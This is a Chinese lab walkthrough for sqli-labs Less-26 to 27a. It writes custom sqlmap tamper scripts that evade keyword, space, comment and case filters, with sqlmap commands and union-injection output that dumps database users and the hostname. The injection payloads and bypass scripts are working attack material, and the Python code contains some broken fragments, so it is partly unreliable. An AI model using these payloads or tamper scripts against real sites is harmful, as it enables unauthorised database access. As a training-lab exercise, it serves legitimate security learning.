当前位置:   article > 正文

SQLMAP脚本-sql-labs-Less-26-27a_a71脚本

a71脚本

testtest

sqli-labs (less-26 and less-26a)

dc5b8977ec274a1580225ab4037ed360.png

 观察后端代码

8b5c37606eb54090b2b62c634b49ed9c.png

发现空格,or,and以及注释符–和#都没了
or,and用双写,注释使用;%00
空格用%09; %0A; %0B; %0D; %20;

编写sqlmap脚本命名为air.py

  1. #!/usr/bin/env python
  2. """
  3. Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
  4. See the file 'LICENSE' for copying permission
  5. """
  6. from lib.core.compat import xrange
  7. from lib.core.enums import PRIORITY
  8. __priority__ = PRIORITY.LOW
  9. def tamper(payload, **kwargs):
  10. """
  11. Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
  12. Requirement:
  13. * MSSQL
  14. * MySQL
  15. Notes:
  16. * Useful to bypass several web application firewalls
  17. >>> tamper('1 AND 9227=9227')
  18. '1%23%0AAND%23%0A9227=9227'
  19. """
  20. payload= payload.lower()
  21. payload= payload.replace('or' , 'oorr') 将or替换为oorr
  22. payload= payload.replace('and' , 'anandd')将and替换为anandd
  23. payload=payload.replace('#',";%00") 将#替换为;%00
  24. retVal = ""
  25. if payload:
  26. for i in xrange(len(payload)):
  27. if payload[i].isspace(): 检测到空格
  28. retVal += "%0b" 替换为%0b 可以自己试试别的能不能用
  29. elif payload[i] == '#' or payload[i:i + 3] == '#':
  30. retVal += payload[i:]
  31. break
  32. else:
  33. retVal += payload[i]
  34. return retVal

test.py 用于打印payloads更好观察payload的改变

  1. # sqlmap/tamper/escapequotes.py
  2. from lib.core.enums import PRIORITY
  3. __priority__ = PRIORITY.LOWEST
  4. def dependencies():
  5. pass
  6. def tamper(payload, **kwargs):
  7. print(payload) 打印payload
  8. return payload

执行命令 ./sqlmap.py -u "http://192.168.227.128/Less-26/?id=3" --technique=U  --users --tamper=tamper/air.py,test.py
--technique 指定注入方式
--tamper 使用脚本
--users 显示用户名

  1. a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b84,1),null;%00
  2. [20:23:45] [INFO] retrieved: ''root'@'::1''
  3. -5593'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b85,1),null;%00
  4. [20:23:45] [INFO] retrieved: ''root'@'::1''
  5. -6736'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b86,1),null;%00
  6. [20:23:45] [INFO] retrieved: ''root'@'::1''
  7. -8374'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b87,1),null;%00
  8. [20:23:45] [INFO] retrieved: ''root'@'::1''
  9. -3304'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b88,1),null;%00
  10. [20:23:45] [INFO] retrieved: ''root'@'::1''
  11. -4517'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b89,1),null;%00
  12. [20:23:45] [INFO] retrieved: ''root'@'::1''
  13. -4869'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b90,1),null;%00
  14. [20:23:45] [INFO] retrieved: ''root'@'::1''
  15. -7274'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b91,1),null;%00
  16. [20:23:45] [INFO] retrieved: ''root'@'::1''
  17. -4829'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b92,1),null;%00
  18. [20:23:45] [INFO] retrieved: ''root'@'::1''
  19. -8704'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b93,1),null;%00
  20. [20:23:45] [INFO] retrieved: ''root'@'::1''
  21. -6012'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b94,1),null;%00
  22. [20:23:45] [INFO] retrieved: ''root'@'::1''
  23. -4253'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b95,1),null;%00
  24. [20:23:45] [INFO] retrieved: ''root'@'::1''
  25. -9915'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b96,1),null;%00
  26. [20:23:45] [INFO] retrieved: ''root'@'::1''
  27. -5771'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b97,1),null;%00
  28. [20:23:45] [INFO] retrieved: ''root'@'::1''
  29. -8983'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b98,1),null;%00
  30. [20:23:45] [INFO] retrieved: ''root'@'::1''
  31. -2093'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b99,1),null;%00
  32. [20:23:45] [INFO] retrieved: ''root'@'::1''
  33. -3862'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b100,1),null;%00
  34. [20:23:45] [INFO] retrieved: ''root'@'::1''
  35. -4369'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b101,1),null;%00
  36. [20:23:45] [INFO] retrieved: ''root'@'::1''
  37. -2212'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b102,1),null;%00
  38. [20:23:45] [INFO] retrieved: ''root'@'::1''
  39. -9541'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b103,1),null;%00
  40. [20:23:45] [INFO] retrieved: ''root'@'::1''
  41. -7175'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b104,1),null;%00
  42. [20:23:45] [INFO] retrieved: ''root'@'::1''
  43. -6760'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b105,1),null;%00
  44. [20:23:45] [INFO] retrieved: ''root'@'::1''
  45. -4589'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b106,1),null;%00
  46. [20:23:45] [INFO] retrieved: ''root'@'::1''
  47. -6738'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b107,1),null;%00
  48. [20:23:45] [INFO] retrieved: ''root'@'::1''
  49. -9742'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b108,1),null;%00
  50. [20:23:45] [INFO] retrieved: ''root'@'::1''
  51. -2312'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b109,1),null;%00
  52. [20:23:45] [INFO] retrieved: ''root'@'::1''
  53. -6153'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b110,1),null;%00
  54. [20:23:45] [INFO] retrieved: ''root'@'::1''
  55. -1282'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b111,1),null;%00
  56. [20:23:45] [INFO] retrieved: ''root'@'::1''
  57. database management system users [4]:
  58. [*] 'root'@'127.0.0.1'
  59. [*] 'root'@'2102cd85683f'
  60. [*] 'root'@'::1'
  61. [*] 'root'@'localhost'

可以看到payload已经替换好了 注入也成功了

less-26a

./sqlmap.py -u "http://192.168.227.128/Less-26a/?id=3" --technique=B --hostname --users --tamper=tamper/air.py,test.py
同样的脚本使用报错注入即可

less-27

89af37f0ebc448109192b01b4c21dce7.png

观察后端代码
fe88d706f47a40c984d607995efe48d9.png

发现比起less-26多了select union 大小写的过滤但是有规律的

更改Air.py代码

  1. #!/usr/bin/env python
  2. """
  3. Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
  4. See the file 'LICENSE' for copying permission
  5. """
  6. import random
  7. from lib.core.compat import xrange
  8. from lib.core.enums import PRIORITY
  9. __priority__ = PRIORITY.LOW
  10. def tamper(payload, **kwargs):
  11. """
  12. Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
  13. Requirement:
  14. * MSSQL
  15. * MySQL
  16. Notes:
  17. * Useful to bypass several web application firewalls
  18. >>> tamper('1 AND 9227=9227')
  19. '1%23%0AAND%23%0A9227=9227'
  20. """
  21. 增加此部分代码 随机给payload转换大小写即可
  22. payload2=""
  23. for i in range(len(payload)):
  24. asciinum= ord(payload[i])
  25. if asciinum <=122 and asciinum >=65 and (asciinum != 91,92,93,94,95,96) :
  26. payload3= int(random.uniform(1,3))
  27. if payload3 ==1:
  28. if asciinum <97:
  29. payload2+=chr(asciinum+32)
  30. if asciinum >96:
  31. payload2+=chr(asciinum-32)
  32. else:
  33. payload2+=payload[i]
  34. else:
  35. payload2+=payload[i]
  36. /*
  37. 增加上方代码
  38. 随机给payload转换大小写
  39. 也可以直接用函数转换大小写,或者直接替换select直接绕过,这里提供一种思路
  40. */
  41. payload=payload2
  42. payload= payload.replace('or' , 'oorr')
  43. payload= payload.replace('and' , 'anandd')
  44. payload=payload.replace('#',";%00")
  45. retVal = ""
  46. if payload:
  47. for i in range(len(payload)):
  48. if payload[i].isspace():
  49. retVal += "%0b"
  50. elif payload[i] == '#' or payload[i:i + 3] == '#':
  51. retVal += payload[i:]
  52. break
  53. else:
  54. retVal += payload[i]
  55. return retVal

 ./sqlmap.py -u "http://192.168.0.101/sqli/Less-27?id=1" --technique=U --hostname --tamper=test.py,air.py

  1. /usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: unknown is an invalid version and will not be supported in a future release
  2. warnings.warn(
  3. 3
  4. -4117'%0bUnioN%0ball%0bSelECt%0b54,concAt(0x71787A7871,(CaSE%0bWhEN%0b(DAtABAse()%0bliKe%0bSCHEmA())%0bTHEN%0b1%0belse%0b0%0bEnd),0x71706B7871),54;%00
  5. [20:18:10] [WARNING] reflective value(s) found and filtering out
  6. web application technology: PHP 5.6.9, Apache 2.4.39
  7. back-end DBMS: MySQL unknown
  8. [20:18:10] [INFO] fetching server hostname
  9. hostname: '20211114-104317'

成功爆出

less-27a

继续使用上个脚本即可

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/148047
推荐阅读
相关标签
  

闽ICP备14008679号